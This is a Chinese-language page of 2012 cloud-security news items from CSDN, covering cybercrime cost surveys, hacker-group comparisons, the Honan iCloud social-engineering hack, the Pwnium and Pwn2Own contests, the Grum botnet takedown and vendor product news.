Ponemon首次将调查范围扩大到其他国家,包括英国、德国、澳大利亚和日本。其中德国和日本这些语言环境中的网络攻击成本显著降低,分别为590万美元和510万美元。

这项研究提供了一些为什么美国网络犯罪的数字远远高于其他国家:“我们发现,美国公司更有可能体验到最昂贵的网络攻击类型,这是由恶意的内部人员、恶意代码和基于web的攻击引起的。”

但研究所创始人Larry Ponemon承认只有56组织参与了调查,样本不足以得到“为什么网络犯罪的成本在美国似乎比其他地方高”这样一个明确结论。

在英国和澳大利亚,网络犯罪成本分别为320万美元和330万美元,拒绝服务攻击更是越来越普遍。德国公司最不可能遇到恶意代码和拒绝服务,而日本公司最不容易遇到恶意内部人员和基于Web的攻击。

报告中提到了与网络犯罪相关联的五个“外部”成本因素:业务中断、信息丢失或被盗、收入损失、设备损坏和“其他”。“内部成本”因素包括检测、调查和升级、密封、恢复和抵御未来攻击的后续措施。

美国公司指出信息盗窃在外部成本总额中占44%。

在参与调查的56家企业中,网络犯罪的成本从140万美元到4600万美元不等。大多数的网络犯罪成本用来减轻拒绝服务、恶意的内部人员和基于Web的攻击造成的危害。

本文来自:NetworkWorld

News stories from Tuesday 25 September, 2012

Favicon for 云安全 16:21 黑客对决:东亚vs东欧 业余的不只是一点点! » Post from 云安全 Visit off-site link

虽然最近几年东亚黑客对全世界公司和政府机构网络攻击的成功案例在持续增长。但对于国际互联网,来自东欧的计算机犯罪仍然显的更有威胁。

Tom Kellermann — Trend Micro(杀毒软件供应商)的副总裁,在最近的一次报告“彼得大帝对战孙子(Peter the Great Versus Sun Tzu【PDF】)”中谈道:“尽管高调的入侵、高级持续性的威胁(APTs)让东亚的黑客霸占了全世界网络安全相关的头条,但是仅凭这一点就断定这些黑客是当今世界独一无二的并构成了最大的威胁明显是错误的。

Kellermann,直到最近还担任美国第44任总统网络安全(Cyber Security)委员会委员。通过指挥大量东亚和东欧地下组织的本质研究后,Trend Micro得出结论:来自前苏联的黑客对比那些更知名的东亚人,显得更加有经验和隐秘。”

当提到恶意软件开发时,东欧人是当之无愧的“老师傅”。他还说:“东欧人的恶意软件是精致的艺术品,曾被誉为恶意软件世界的法贝热彩蛋(Faberge Eggs)。”

东亚的黑客通常使用zero-day漏洞,去入侵计算机系统。但是之后他们还要依靠基本的恶意软件和第三方工具来维持和扩张目标网络上的权限。

小型、高级“黑”

相比东亚,东欧的黑客首次入侵的漏洞利用一般建立在其他人的基础上,但是使用的软件都是基于目标并且包含了所有功能的定制恶意软件。

Kellermann解释到,东欧出产的恶意程序往往都是很轻量级的并且拥有先进的检测躲避技术。

Kellermann把领先的恶意程序编写技术归功于长期的高质量科学和数学教育。他还认为这项优秀技术同样要归功于对每行代码的严格要求,而这些则因为前苏联的计算科学只能在低复杂度的计算资源上实现。

Bogdan Botezatu,BitDefender(罗马利亚杀毒软件供应商)的高级互联网威胁分析师在9月20日的邮件中说:“作为一个东欧的反恶意软件技术供应商,我们同样认为欧洲的恶意软件地下组织比起东亚的更加工艺和传统。”

Botezatu说:“后共产主义时代的初期,东欧(特别是保加利亚和罗马)青年的价值取向发生了巨大的变化(受资本主义影响巨大)。在数学和密码运算的大背景帮助下,东欧人迅速成为政治斗争道路上无可争议的冠军。”

BitDefender研究员说道:“经过20多年的运动后,这些组织的目标从政治斗争上转变到编写商业恶意程序上。他们恶意软件、封装及密码学的经验也发生了巨大的改变。”

另一个东欧黑客比东亚更富有威胁的原因来自运作方法,Kellermann将其喻为因出色技艺被雇佣的独立突击队单位。

东欧黑客以小团队为运营模式,对于每次入侵明确、专注,不遗余力的保护他们的身份。因为声誉对于他们来说是成功的关键所在!

东欧的地下是由许多独立单位构成组织严密的社区,互相之间的数据购买和销售更是司空见惯。假如可靠性产生问题,那么盈利和生存的能力将被破坏,甚至走向灭亡。

行窃交易数据

与之相反的是,东亚黑客就像“网络步兵”,他们好像从来不去担心是否被侦察或识别,Kellermann说。

他认为这是因为他们是作为由特定组织提供基金的大型组织的一部分来运作的,经常是从企业或者政府窃取商业机密和敏感数据。

假如身份暴露的是一个东亚黑客,他失去的则没有那么多,并且可以轻松的回到工作中。某种意义上,对于东亚黑客来说:集团资金意味着更好的金融稳定。

与此同时,东亚黑客窃取的数据一般都是可以立即售出或用于盈利,比如:金融凭证、信用卡资料或者私人信息。这也是东亚黑客地下组织开发了电子洗钱系统的原因,使用了客户审查和交替付款通道。

David Harley,ESET(来自斯洛伐克的杀毒软件供应商)的高级研究员20日通过电子邮件说:“这也许是个不错的想法,但是还是有点太草率了。”他认为,曝光对于一些东亚黑客来说是一种自我宣传的手段。

Harley说:“追溯到早些年,中国的黑客刚开始进入我们视线的时候,他们甚至没有仔细的掩盖自己的痕迹(当然除下攻击目标)。例如,我们获取了很多Wicked Rose(中国知名黑客组织的队长)和他队友的信息。”

Harley认为,东亚的黑客行事风格比较罗曼蒂克;而相比东亚的黑客来说,东欧的黑客不是那么在乎荣誉,他们认为比起出名,他们失去的将会更多。

Kellermann总结了两个黑客市场的特征,认为:相比东欧黑客来说,东亚黑客业余了很多。在队伍技术的成熟度上,东亚黑客和东欧黑客也完全不在一个等级上。(编译/仲浩 王旭东/审校 原文来自PCWorld

欢迎关注@CSDN云计算微博,了解更多的云信息。

本文为CSDN编译整理,未经允许不得转载。如需转载请联系market@csdn.net

News stories from Tuesday 18 September, 2012

Favicon for 云安全 01:37 瑞星防毒墙:移动互联时代中的智能安全方案 » Post from 云安全 Visit off-site link

 

云计算与移动应用的普及使得企业与个人生活之间的界限更为模糊。BYOD(携带自有设备办公)、VDI(虚拟桌面)和SaaS应用已经改变了企业管理的传统模式。越来越多的个人移动终端通过企业内网接入互联网获得相关数据与资源,如通过iOSAndroid使用FacebookTwitter、微博、人人或DropboxGmail等;越来越多的个人习惯使用移动终端来接入办公系统实现邮件收取与发送,业务申请与审批等工作流程。由内而外及由外而内的安全问题已经不容企业忽视。

 

传统手段防护不足

 

近期多项调研数据也证明了这一点。有分析称:平均每秒钟就有一个新的安全威胁产生,每5分钟就会发生一起网络入侵行为几乎75%的企业都存在一个或多个僵尸病毒,而超过90%的企业内潜伏着恶意软件。仅2011年,涉及银行网银账户盗刷和支付账户盗窃的受害者就超过54万人,预计损失在21亿元之上。2011年国内数宗数据泄漏事件也完全印证了这些数字。作为蓄谋已久的恶意商业间谍软件,其实现手段或是通过社交软件的恶意邮件进行攻击,或是利用防火墙、服务器等系统漏洞获得访问企业网络的有效凭证使用APT攻击。而这些攻击往往具备高度隐蔽性,时间周期较长,一般的传统安全方案(如防病毒软件、防火墙、IPS等)很难发现并进行有效处理。

 

这不难理解。目前我国绝大多数企业都采用了网络版杀毒软件+防火墙的方式来保护企业的网络正常运行。网络版杀毒软件部署在企业网络内部,可以对网络进行统一集中管理。但作为多年来的防毒手段,其通过升级病毒库对不同病毒进行查杀,先病后治的方案已然有所局限。首先,安装在操作系统上的杀毒软件本身受限于平台是否稳定,漏洞是否明显;其次,高攻击性的病毒往往利用操作系统的漏洞进行攻击和传播,而操作系统厂商发布漏洞补丁的周期并不确定,从而使得局域网感染几率增大很多,杀毒软件经常束手无策;最后,移动互联的爆发式增长催生了数以十万计的移动应用程序,这些App应用现已成为地下黑色产业链的集中攻击目标,而杀毒软件在BYOD方面的经验还不足。正是因为这些不足,很多企业采用了硬件级防护产品与之配合,如:网络防火墙,入侵检测系统等。但面对来势汹汹的安全危机,通过阻止IP来实现对病毒以及黑客的防御的传统防火墙无法实时检测网络状况,企业的安全需要更多智能方案,比如防毒墙,上网行为分析,运维管理审计系统等。

 

新型方案贵在智能

 

已有企业在防毒方面走的更远。一位中型企业CIO曾对CSDN表示:网大了,管理的难度就大;上网容易了,客户端就更容易受伤了。要想同步实现安全边界与资源互访,在网关这一层架设防毒过滤产品势在必行。

 

但是作为高端杀毒设备,目前市场上的防毒墙种类很多,企业该如何挑选防毒墙与相关解决方案更加符合系统规划与平台管理?瑞星给出了明确的答案。1991成立的,中国最早的防病毒标志,瑞星一直专注于信息安全领域,建立了国内规模最大、实力最强的研发团队,致力于帮助企业和政府机构有效应对网络安全威胁。目前,瑞星已为政府、运营商、金融、军队、能源等行业客户,提供具有核心竞争力的安全解决方案。

 

在瑞星看来,中国企业信息安全解决之道——防于外·治于内·理于全。为此,瑞星将于2012918日举办盛大的瑞星企业级硬件新品发布会。本次会议上,瑞星将一次性发布最新设计的导线式防毒墙以及运维管理审计系统在内的多款瑞星公司企业硬件安全新品,更加惊喜的是,全世界目前仅有两台的性能最高的瑞星万兆超级防毒墙也将同步亮相。

 

移动互联与云计算的时代,瑞星更好帮助企业实现智能安全新管理!

 

News stories from Saturday 25 August, 2012

Favicon for 云安全 00:47 2012第二季度SQL注入攻击增长69% » Post from 云安全 Visit off-site link

众所周知,SQL注入攻击是最为常见的Web应用程序攻击技术。同时SQL注入攻击所带来的安全破坏也是不可弥补的。

根据云安全供应商FireHost的报告显示,第一季度FireHost拦截的SQL注入式攻击为277770次,第二季度的SQL注入攻击为469983。相比于2012年第一季度,第二季度的SQL注入攻击上升了69%。SQL注入攻击通过在URL提交的恶意文本命令窃取数据库内存储的的数据,如信用卡信息或用户名、密码等。

与此同时,夸站脚本攻击(XSS)较上一季度有下降的趋势,这主要是由于浏览器安全性的改进以及其他一些因素。

FireHost同时关注了目录遍历和跨站请求伪造攻击(CSRF),总体而言,目录遍历在第二季度同比增长了43%,其次XSS占27%、SQL注入占21%、CSRF占9%。

Chris Hinkley表示目前有相当多的自动化工具,只要按下一个按钮就可以得到所有的数据库信息,导致破坏大量的组织信息。表示通过部署完善的代码可避免SQL注入漏洞,包括在软件开发过程中的安全性措施。

从FireHost的调查报告可以看出第二季度恶意攻击来源美国占了83%,南亚8%排在第二,欧洲6%排在第三。(李智/编译 张志平/审校)

原文链接:infosecurity-magazine

News stories from Tuesday 21 August, 2012

Favicon for 云安全 16:54 Google受虐成瘾 两百万美元助阵Pwnium2 » Post from 云安全 Visit off-site link

三月份Google举办了首次Pwnium黑客大赛,广邀各大黑客攻击Chrome浏览器。然而为了Chrome浏览器的更加完善,上个星期Google又宣布今年秋季第二届Pwnium黑客大赛将投入200万美元。

Pwnium 2举办的前几个星期,惠普公司策划专注于移动领域的Pwn2Own赛事,奖金也高达了20万美元。

Google的Pwnium 2将于2012年10月10日在吉隆坡举行。

和3月份在温哥华举行的CanSecWest会议一样,黑客们将发起对Chrome当前版本的挑战。每个被开发者证实的完全类别漏洞都将获得高达6万美元的奖金。

Google口中的完全Chrome漏洞 — 在Win7上利用Chrome本身漏洞并成功攻陷浏览器的黑客将获得6万美元大奖(和上届大会同样的金额)。

利用至少一个Chrome漏洞再加上诸如WebKit或Windows核心漏洞最终攻陷浏览器将获得5万美元;利用非Chrome漏洞(Flash、驱动等漏洞)攻陷浏览器也可以获得4万美元。

同样增加了一个新的不完全漏洞类别,Chrome安全团队工程师Chris Evans星期三在他的Google博客说道,对于另辟蹊径的人,只要值得我们学习就必须奖励。只要通过奖励小组的审核,我们就会慷慨解囊!

Google虽然承诺在Pwnium 2上的奖励为2百万美元,但是这不代表总奖额接近两百万的时候就会结束奖励。就像上届的Pwnium大赛上付出的总奖金达到了120万美元一样(首届Pwnium做出承诺为100万美元)。

Google声明除下不完全类别,研究人员不仅需要指出漏洞所在,而且还要给Google提供利用漏洞的代码。

Evans重复了Google之前的发言,Pwn2Own的成功让我们学到了如何用Google的开源项目来充实Chrome。

首届Pwnium大赛中有两人获得了最高奖项,他们是Sergey Glazunov和“Pinkiepie”(之前不为所知,也没有递交bug。用一周半的时间编写了进攻程序,利用三个不同的0day漏洞写出攻击程序成功执行偷渡式下载攻击打破了Chrome Sandbox的神话),都获得了6万美元的奖金。

其他有偿黑客赛事

在Pwnium 2之前还有另一个黑客赛事 — Pwn2Own。

HP的TippingPoint将于9月19至20日在的EusecWest安全性会议中举Pwn2Own赛事。在这里黑客可以从Apple、Nokia、RIM及Samsung等手机中选出一个进行攻击。

TippingPoint的Zero Day Intiative漏洞购买计划将贯穿整次赛事。得到AT&T和RIM(黑莓手机制造商)的赞助,Pwn2Own的奖额破纪录的达到了20万美元。大赛项目包括了移动浏览器、NFC、SMS等。查看更多Pwn2Own赛事详情请点击这里。(编译/仲浩 王旭东/审校 原文来自pcworld

News stories from Wednesday 08 August, 2012

Favicon for 云安全 21:05 Apple的难言之隐:我后面有人! » Post from 云安全 Visit off-site link

 

Amazon在星期一对用户保密政策进行了修改,关闭了Mat Honan在星期5入侵中用到的所有安全缺口。

在这之前Amazon允许用户通过致电客服来修改与Amazon账户相关的电子邮箱地址,仅需核对姓名、电子邮箱地址、邮箱地址(这三个信息可以轻松的从线上获得),就可以完成向账户中添加银行卡的操作。

Amazon在星期二给他客服传达了不再允许客户通过致电的方式修改用户信息,比如银行卡 、与账户相关的电子邮箱。

Amazon官员并没有对此次改变做出评论,但是通过星期二Amazon客服代表中了解到,针对用户资料安全设想的新政策在当天早上就发出了。

一个19岁自称为“Phobia”的黑客在星期五利用了这个安全漏洞,获得了短暂权限成功的入侵了Honand的Amazon账户。一旦Phobia和其他的黑客成功的连入Honan的Amazon账户,那他们就可以得到与账户关联的信用卡卡号的后4位数字。

接着黑客利用得到的后四位数字去欺骗Apple的服务代表取得Honan Apple的ID权限,并删除了Hotnan的iPhone,iPad和MacBook上的数据,最后还连入了一系列的电子邮箱,比如Twitter账户。

在星期二当我们用同样的方式获取Amazon权限失败的时候发现Amazon已经修改了政策。Amazone在整个星期一拒绝对安全性做出评论,也未对Wired针对此漏洞的电话做出回复。(仲浩/编译 审校/王旭东 原文来自wired

News stories from Tuesday 07 August, 2012

Favicon for 云安全 16:44 金盆洗手!大名鼎鼎的黑客Kevin Mitnick谈云安全 » Post from 云安全 Visit off-site link

著名黑客之一,如今也是安全顾问的Kevin Mitnick形容自己的在线生活就像是一个大游戏。“我就像是山中之王,”Mitnick说,“所有人都想要将我从宝座上拉下。” 为此,他找到了一个骑士——云计算提供商FireHost。(Kevin Mitnick = 凯文 米特尼克)

昔日大名鼎鼎的黑客Kevin Mitnick如今“金盆洗手”了

这很容易理解。作为早期大名鼎鼎的罪犯之一,Mitnick曾“黑”掉了若干重要系统,并因此而在联邦监狱中呆了五年。现在,作为一个畅销书作家和一名安全顾问,他却在试图保护客户信息,这显然与其经历大相径庭。所以,如果有人因此打倒了Mitnick(攻破其保护的系统),那其背后的意义显然超越这一事件本身。

具有讽刺意味的是,Mitnick,曾经的一名云计算安全的怀疑论者,却最终被云所拯救。

谁不喜欢自由?

在这之前,他曾经使用一个不太成功的虚拟主机来讨好他的女朋友,但是却在很多地方违反了规定。由于其没有进入服务器的行政权限,他什么也做不了。但2009年,一个云供应商——FireHost主动向Mitnick走来,并为他的网站提供免费主机服务为条件请他来帮忙抵御入侵。

Kevin Mitnick的名片真是个性

这之后的三年,Mitnick的企业网站一直运行在FireHost的云中。到目前为止,他表示一切都很好。比如分布式拒绝服务攻击——包含本周早些时候——被证明只是一些骚扰;一个月以前一些人放置的跨站点脚本漏洞,不过在造成可能危害之前已经被处理了。

安全永远第一

当然,Mitnick也不会给对手任何可乘之机。即使是之前的托管服务提供商,他也表示:“我没有留下任何有价值的东西(在web服务器上),在FireHost上也是如此。其网站是动态页面仅是用来联系的Email,(也是这次漏洞放置点),和尽可能少暴露其服务器信息,比如只有80端口。当他访问其虚拟服务器的时候,他常常利用VPN然后在通过SSH来做变化。

Mitnick也是Amazon EC2的一名用户,但是他更为小心,也许是因为成本意识。Mitnick主持了EC2上的黑客示威游行,但是仅仅在其演讲之前、过程中和之后,活跃了很短的一段时间。 这帮助他远离攻击。

对于云计算的安全,Mitnick表示:“如果我运营一个企业,我会选择将数据放到本地,而将应用放到云中。”在他看来,第三方专有数据和无法亲自进行测试与验证的云服务供应商都是不可信的。Mitnick信任FireHost并允许后者进入他的资源池。但对亚马逊,他承认,并没有做足功课,所以无法确定其网站是否安全。

你从未听说过的云安全

并非只有Mitnick这样说,国际知名家企业如Johnson & Johnson,3M,Farmers Insurance和Johns Hopkins University都是FireHost的客户。FireHost吸引他们的一大因素就是其乐于向客户提供其所需要的安全、性能和可用性测试。

FireHost的定位与众不同

FireHost创始人、CEO Chris Drake表示:“消费模式不仅是技术更是人文。FireHost没有一个销售人员,但是当客户认为在这里可以获得一流的安全和性能—即使测试技术性验证测试—同时像EC2一样易于管理时,‘鱼就跳到了船上’。”

技术安全措施以外,FireHost还在经营各类虚拟HOA。但是其不会将空间租给游戏、赌博和色情网站。因为这些网站往往会引发堵塞进而影响虚拟邻居,并且令人反感。当然,因此FireHost也失去了一些容易赚钱的机会。

Mitnick的建议

Mitnick建议所有准备采用云的企业:选择他们要选择云供应商服务,要确保其应用是安全的。最近,就有一家做云桌面的服务商想要Mitnick来做代言(说明其产品的安全性),但Mitnick坚持要先亲自测试才能同意。

这是一个不太合算的决定。1小时内,他在虚拟桌名运行的情况下实现虚拟机的访问;8个小时内,他得到了控制权,并破解了多组密码。“不幸的是”,Mitnick说:“我要花费比这几个小时更多的时间来说明我是如何做到这些的。”(郭雪梅/编译)

原文链接:kevin-mitnick

本文为CSDN编译整理,未经允许不得转载。如需转载请联系market@csdn.net

Favicon for 云安全 00:58 量子加密:只可远观不可近玩? » Post from 云安全 Visit off-site link

微型谐振器与集成量子点发射单个光子

量子密码是你可能永远不会使用的最酷的技术之一,但现在这项技术正离我们越来越近。

德国研究人员已经找到了一种新的、更有效的方式来产生光子(光粒子是形成量子计算的构建模型)。

共享密匙的量子方法是令人兴奋的,因为这将是一个令人难以置信的安全的加密做法。量子密码是通过测量计算机之间发送的光子的偏振来获取加密密匙。并根据Heisenberg的测不准原理,任何人在窃听通信时都将搞乱偏振,这会很容易察觉到。

到目前为止,已建成利用外部激光器使用光子来进行量子密匙交换。这种新的激光技术将让大规模生产更便宜,维尔茨堡大学应用物理系的小组负责人Sven Höfling说,可以用电力驱动量子密匙分配,真正兼容标准半导体技术,这就意味着它原则上会很便宜。

他说,他们已在实验室中通过了40厘米的连接测试,使用了约20000美元的实验设备。

密码学专家Bruce Schneier和其他人认为,量子密码在目前来说不是很实用,但这并不妨碍它非常酷。

本文来自:Wired.com

News stories from Monday 06 August, 2012

Favicon for 云安全 18:16 iCloud被盗事件升级:黑客巧用“社会工程学”入侵账户 » Post from 云安全 Visit off-site link

    8月6日消息,苹果iCloud账户被盗事件愈演愈烈,被害者声称黑客利用“社会工程学”骗过了苹果客服,直接入侵了自己的账户。

前《连线》杂志特约编辑马特•霍南(Mat Honan)是本次账户被盗事件的被害者。黑客成功入侵了霍南的iCloud账户,重置了他的账户密码,远程删除了iPhone和iPad上的数据,造成了不可挽回的损失。

原先,霍南以为黑客是通过暴力破解入侵账户的,不过今日一切真相大白。霍南在博客中宣布:

“在同黑客以及苹果方面取得联系后,我知道来龙去脉了。一切和密码无关。黑客利用社会工程学骗取了苹果客服人员的信任,绕过了密码安全问题,直接入侵了我的账户。”

“社会工程学”即是在网络上伪装成另一个人,并窃取他人信息的学问。

在此类袭击面前,人们无处可逃。即使你记住了最复杂的密码组合,设置了最精妙的安全问题,只要黑客能够说服网络另一端的客服人员“他”就是你,那么所有的安全措施都是形同虚设。

对苹果来说,iCloud有可能因为不够安全而沦为一片阴云。毕竟,iCloud赋予了账户所有人查看文档,照片以及销毁设备数据的权力。设置安全问题的本意是为了保护那些忘记密码的用户,然而许多粗心的用户们往往也记不住安全问题的答案。所以,苹果的客服人员天天都在帮助那些马虎的用户们绕开安全问题,直接登录账户。

在本次高调的盗号事件后,苹果的弱点被完全暴露在聚光灯下。但是从长远来看,客服等人员权限是否应该永远高于机器权限,值得探讨。

 

News stories from Thursday 02 August, 2012

Favicon for 云安全 23:36 Dropbox推出新款安全机制 谨防黑客再次入侵 » Post from 云安全 Visit off-site link

周一晚上,Dropbox承认,几个星期前困扰用户的垃圾邮件是由于来自第三方网站的黑客获取了“少数”Dropbox用户的账户和密码。

该公司称:我们的调查发现,最近从其他网站被盗的用户名和密码,用于登录到少数的Dropbox账户。我们已联络这些用户,并帮助他们保护了他们的账户。一名Dropbox的员工也遭受了入侵,其账户内包含一个有用户电子邮件地址的项目文件。对此我们深表歉意,并将采取更多的控制措施来确保此类事件不会再次发生。

Dropbox表示将在几周内开始提供双重身份验证选项,并提供一个新的网页,让用户可以检查他们Dropbox账户的访问情况。

该公司建议用户为他们所有的账户选择独特的(和新的)密码,以提高账户安全性。

这造成了一些网上评论者的怀疑和愤怒,有人说,为什么Dropbox的雇员有用户的电子邮件的地址,也有人说没有证据表明旧密码本质上是不安全的,另外一些人则指出,他们总是使用独特的密码,但仍然收到了垃圾邮件的攻击。

正如TechCrunch指出,Dropbox账号被盗让人联想到今年六月份LinkedIn数百万账号泄露事件

这证明了云服务也不能完全免疫安全威胁,一个网站提出,Dropbox的管理人员必须随时保持警惕性。网友Albundy写道:“我离开了云的世界,现在使用. BB dropbox。”

本文来自:GigaOM

News stories from Wednesday 01 August, 2012

Favicon for 云安全 00:08 黑客攻破中国电信网络!中国Q2安全不容乐观 » Post from 云安全 Visit off-site link

7月31日,趋势科技正式发布了《2012年第二季度中国安全综合报告》。报告指出,二季度趋势科技中国区病毒码新增特征约59万条,客户终端检测并拦截恶意程序约8420万次,发现并拦截新的恶意URL地址约33万个。报告称,目前网络安全形势依然严峻,且出现了宏病毒趋于爆发、安卓系统病毒增多等新的态势。

据趋势科技网络安全检测实验室显示:趋势科技通过对中国区常见病毒特征库进行不断优化,目前总数达到约400万条。为了更好地服务中国客户,趋势科技多年前就将病毒码新和Web信誉查询服务器设在国内,通过对中国区本地病毒码多年的搜集和积累,以及最独特的云安全技术,在恶意程序发动攻击前,为用户提供保护及防御。

古老病毒升级大翻身 宏病毒在本季度趋于爆发

报告显示,传统安全威胁在本季度更加突出,且部分古老的病毒通过翻新升级,已经有死灰复燃、卷土重来的迹象。如W97M/X97M(Word/Excel宏病毒)在二季度呈现出爆发的趋势,这种病毒将通过感染Word/Excel等文件威胁用户的重要数据和信息。用户如感染此病毒,可用趋势科技中国区病毒实验室制作的专杀工具来查杀。

宏病毒是一种比较老的病毒,它的传播速度十分快。而最新发现的宏病毒采用了新的技术,使这种病毒可以做更多的事情。Office文件中往往保存了用户的重要数据和信息,宏病毒的增长也给数据安全带来了很大的挑战。

木马病毒稳坐总冠军  安卓系统病毒数量不断增多

2012年第二季度中国地区,木马病毒作为我国目前存在数量最多的病毒类型,仍然占据新增病毒数量排名首位。木马大部分具有盗号的特性,比其他类型的电脑病毒更容易编写且更容易使病毒制造者获益。在经济利益的驱使下,更多病毒制作者开始制造木马病毒。其中,新增木马病毒特征335161个,大约占新增病毒数量的57%。

安卓作为手机平台的操作系统,由于它的开源特性得到了众多设备厂商以及软件开发者的青睐,也成就了它的迅速崛起。2012第二季度新增病毒种类中,AndroidOS(安卓系统病毒)排名又有上升,新增的安卓系统病毒特征数量为3044个,较之于上季度又增加10%。然而,在安卓系统风光的背后,也隐藏了种种无奈——基于该平台的病毒伴随而来。虽然Google在已发布的安卓4.0 中引入了ASLR技术以及对用户凭据安全进行了加固,但是趋势科技认为这些安全加固,对于阻止吸费以及窃取信息类型的病毒的作用并不是特别大。而吸费和窃取信息又正是目前手机病毒的主流。所以安卓平台上的病毒数量仍然会持续增长。手机系统的安全正在面临越来越艰巨的挑战。

不良上网习惯易遭受Web威胁  恶意脚本仍是黑客主流手段

其中通过Web传播的恶意程序中,约有55.3%为JS(脚本类型文件)。向网站页面代码中插入包含有恶意代码的脚本仍然是黑客或恶意网络操控者的主要手段。这些脚本将导致用户连接到其它恶意网站并下载其他恶意程序,或者IE浏览器主页被修改等。一般情况下这些脚本利用各种漏洞(IE 漏洞,或其他应用程序漏洞,系统漏洞)以及使用者不良的上网习惯而进行其他恶意行为(或者传播病毒)。

通过对拦截的Web威胁进行分析,趋势科技发现:约有68.8%的威胁来自于General exploit (针对漏洞的通用检测)。其中包括利用Adobe 软件的漏洞(例如:一些.SWF类型的Web威胁文件)。以及利用跨站脚本漏洞攻击,对正常网站注入恶意JS脚本,或插入恶意php,html代码。此外,还有一些被挂在互联网上的具有宏病毒的Office文档。 

2012年第二季度网络安全信息还包括:

趋势科技中国区病毒实验室在本季度接到数起网络购物欺诈案件,很多欺诈案件都是通过钓鱼网站引诱用户进行操作。

《九阴真经》《暗黑3》等网络游戏遭钓鱼网站围堵,不法分子以“领取免费大礼包”为诱饵,再加上钓鱼邮件、社交网络虚假信息发布等辅助攻击手段盗取玩家装备,使其虚拟财产承受损失。

黑客组织Swagger Security近日宣布其攻破了中国电信和华纳兄弟的网络,并在网上发布了其从不安全的SQL服务器获取的中国电信网络管理员的900个用户名和密码。

2012年第二季度,微软发布紧急公告,称Windows基础组件出现高危漏洞“暴雷”,并推出“暴雷”漏洞临时解决方案。据悉,“暴雷”是基于Windows基础组件的远程攻击漏洞,黑客可以通过该漏洞,以恶意网页、文档等形式将任意木马植入用户电脑,窃取重要资料和账号信息。

美国计算机应急预备小组本季度发布了一份安全报告,一些64位操作系统和虚拟化软件程序在Intel处理器上运行时,容易受到本地特权扩大攻击( local privilege escalation)。

News stories from Thursday 26 July, 2012

Favicon for 云安全 21:21 你的Gmail账户价值几何? » Post from 云安全 Visit off-site link

你可信赖的Gmail账户的价值可能比你想象的更多。

Backupify把一些云备份产品放在一起计算,以帮助人们估算基于云的谷歌Gmail的价值。那么,它的账户价值为多少?Backupify的Jay Garmon表示其平均价值为3588.85美元

这是在Gmail中耗费的平均时间换算成的价值,Gmail用户平均已书写了5768封电子邮件,编写一封电子邮件平均要耗费1分43秒,并按照最近的美国平均年薪(45230美元)计算,用户写过的所有Gmail邮件,将花费3588.85美元。

这次统计中发现的的一些有趣的亮点:

你的Gmail价值3588.85美元,并且每年增加约1196美元;

你在Gmail中的花费,和你每年在你的车上花一样多;

你的Gmail比你的笔记本电脑贵4倍;

你的Gmail价值相当于你四个星期的工资;

每天你都存储一个老式软盘(1.44MB)的Gmail数据。

本文来自:Wired.com

News stories from Monday 23 July, 2012

Favicon for 云安全 20:29 防不胜防:插线板实为黑客工具 可短信控制 » Post from 云安全 Visit off-site link

说起间谍工具,笔者不由得想起小时候一部美国电视剧《糊涂侦探》中的种种稀奇古怪的道具。离电视剧中的时代已经过去了40年,类似的玩意儿依然层出不穷,比如这家名为Pwnie Express的公司开发的插线板之王"Power Pwn"。

外表看来,Power Pwn和一款普通的防浪涌插座没什么两样——如果你没看到角落里的网络/USB接口的话。实际上其中已经集成了不少模块,包括802.11 b/g/n无线路由、蓝牙功能、双千兆网卡、3G基带、16GB存储空间等。同时还预装有Debian 6 Linux操作系统,支持多种加密连接如HTTP代理、SSH、VPN。

根据美国《连线》杂志的报道,之所以说是黑客向产品,主要是因为Power Pwn的开发受到了五角大楼旗下机构DARPA的资助,并可以通过简单的英文短信来控制,隐身模式下也会掩盖端口并防止ping。不过这款产品实际上还是主要面向企业级安全市场的,可用来对内网进行安全测试。根据统计调查,开发公司Pwnie Express 90%以上的用户都是公司集团或者美国联邦政府旗下部门。

当然,面向企业级和政府部门的这款产品售价肯定不菲,尤其是网络安全产品:Power Pwn的单价为1295美元,将于9月30日开始出货。

原文链接:驱动之家

News stories from Thursday 19 July, 2012

Favicon for 云安全 23:13 研究人员重创世界第三大僵尸网络 » Post from 云安全 Visit off-site link

在本周三,计算机安全专家重创了世界第三大僵尸网络Grum。计算机安全专家说,Grum控制了全球18%的垃圾邮件,每天的垃圾邮件达到180亿。

计算机安全专家本周二在荷兰和巴拿马封锁了僵尸网络的命令和控制服务器。但当天晚些时候,Grum的架构师在俄罗斯和乌克兰建立了7个新的命令和控制中心。总部设在加利福尼亚州米尔皮塔斯的计算机安全公司FireEye说,它与和俄罗斯同行以及英国的SpamHaus合作,共同跟踪和拦截垃圾邮件,在星期三上午的时候,重创了命令和控制中心。

研究人员说,他们通过跟踪Grum追踪到其服务器,并提醒网络供应商关闭这些计算机的服务,从而战胜僵尸网络。

技术专家并没有等执法部门,而是自己采取了行动。今年早些时候,微软员工协助联邦法警在宾夕法尼亚州和伊利诺伊州查抄了一个僵尸网络服务器。这些犯罪分子利用服务器运行一个僵尸网络Zeus,在被感染的电脑上偷取个人信息,如网上银行的账户密码和信用卡号码。与此同时,一个单独的网络安全研究人员在旧金山忙着清楚另一个名叫Kelihos.b的僵尸网络,它被用来发送垃圾邮件。

虽然计算机安全公司都在迅速清楚僵尸网络,但他们的成效往往是暂时的。Kelihos.b被清除了不到一个星期后,就推出了一个新的版本。微软的在2010年消灭的另一个僵尸网络Waledac,其创建者只是稍微修改了一下架构,就创建了一个新的僵尸网络。

但是Grum的创建者将不仅仅是运行一个新的命令和控制就可以他的僵尸网络。

FireEye的计算机安全专家Atif Mushtaq说,这不是创建一个新的服务器的问题,他们必须开始一轮新的感染,才能取得像Grum一样的效果。他们不得不从头开始构建,因为恶意软件是为Grum写的,当主服务器宕机时,受感染的机器可以不再用一个新的服务器发送垃圾邮件或进行通信。

本文来自:Bits

News stories from Tuesday 17 July, 2012

Favicon for 云安全 22:47 首家云杀软厂商Panda更新版本 妥善保护云安全 » Post from 云安全 Visit off-site link

Panda是最早(2009年)为云计算提供杀毒服务的公司,在本周一,其发布了Panda云杀毒软件2.0,增加了一个新闻杀毒引擎,一个基于社区的防火墙,并且扫描速度提高了50%。

Panda的基于云得免费杀毒软件已提供它所谓的集体智慧技术,但2.0服务增加了基于行为的扫描技术,这项技术以前只在专业版里提供。

Panda在本周一的新闻稿里说:

Panda云杀毒软件2.0包含了一系列的改进,旨在为用户抵御越来越复杂和多样化的威胁,防止恶意软件获取过去的防病毒程序后,适应其扫描的技术和对风险的敏感性,为项目带来风险。

